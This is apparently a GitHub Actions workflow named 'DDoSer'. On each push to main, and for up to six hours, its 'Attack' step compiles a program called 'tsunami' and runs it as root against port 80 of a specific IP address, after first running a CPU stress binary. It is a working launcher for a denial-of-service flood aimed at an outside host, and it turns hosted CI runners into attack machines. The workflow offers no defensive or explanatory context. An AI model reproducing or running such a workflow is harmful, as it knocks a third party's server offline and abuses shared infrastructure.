name: DDoSer
on:
  workflow_dispatch:
  push:
    branches: [ main ]

jobs:
  run-main:
    timeout-minutes: 360   # Максимум на GitHub-hosted runner (6 часов)
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v5

      - name: Attack
        run: |
          cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver 2>/dev/null || echo "Нет драйвера (управляет гипервизор)"
          cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor 2>/dev/null || echo "Нет governor"
          cat /sys/devices/system/cpu/cpu0/cpufreq/energy_performance_preference 2>/dev/null || echo "EPP не поддерживается/не активен"
          clang++ -O3 -std=c++17 cpu_stress.cpp -o cpu_stress -lpthread
          sudo ./cpu_stress
          cat /proc/sys/net/core/somaxconn
          gcc -std=c2x -march=native -O3 -o tsunami tsunami.c -pthread
          sudo ./tsunami 195.154.210.21 80 4
